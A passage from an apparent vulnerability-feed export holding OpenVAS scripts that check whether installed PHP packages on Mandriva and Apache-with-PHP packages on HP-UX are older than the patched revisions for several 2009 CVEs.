http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", 
rpm:\"php-devel~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.4~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.4~3.6mdv2008.0\", 
rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", 
rpm:\"php-pdo_odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-simplexml\", rpm:\"php-simplexml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.22~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 
vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:04:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "Check for the Version of Apache with PHP", "modified": "2018-01-18T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:1361412562310835236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835236", "type": "openvas", "title": "HP-UX Update for Apache with PHP HPSBUX02543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache with PHP HPSBUX02543\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n unauthorized Access\n cross site scripting (XSS).\";\ntag_affected = \"Apache with PHP on\n HP-UX B.11.11, B.11.23, B.11.31 running Apache with PHP v5.2.6 or earlier.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache with PHP. These vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS) gain unauthorized access, and perform cross site \n scripting (XSS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02247738\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835236\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02543\");\n script_cve_id(\"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3557\", \"CVE-2009-4017\", \"CVE-2009-4018\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_name(\"HP-UX Update for Apache with PHP HPSBUX02543\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Apache with PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n 
script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 
exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", 
revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:32:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "Check for the Version of Apache with PHP", "modified": "2017-12-21T00:00:00", "published": "2010-06-23T00:00:00", "id": "OPENVAS:835236", "href": "http://plugins.openvas.org/nasl.php?oid=835236", "type": "openvas", "title": "HP-UX Update for Apache with PHP HPSBUX02543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache with PHP HPSBUX02543\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\n unauthorized Access\n cross site scripting (XSS).\";\ntag_affected = \"Apache with PHP on\n HP-UX B.11.11, B.11.23, B.11.31 running Apache with PHP v5.2.6 or earlier.\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX running \n Apache with PHP. These vulnerabilities could be exploited remotely to create \n a Denial of Service (DoS) gain unauthorized access, and perform cross site \n scripting (XSS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02247738\");\n script_id(835236);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-23 12:17:53 +0200 (Wed, 23 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02543\");\n script_cve_id(\"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3557\", \"CVE-2009-4017\", \"CVE-2009-4018\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n script_name(\"HP-UX Update for Apache with PHP HPSBUX02543\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of Apache with PHP\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.10\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.16\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.16\", 
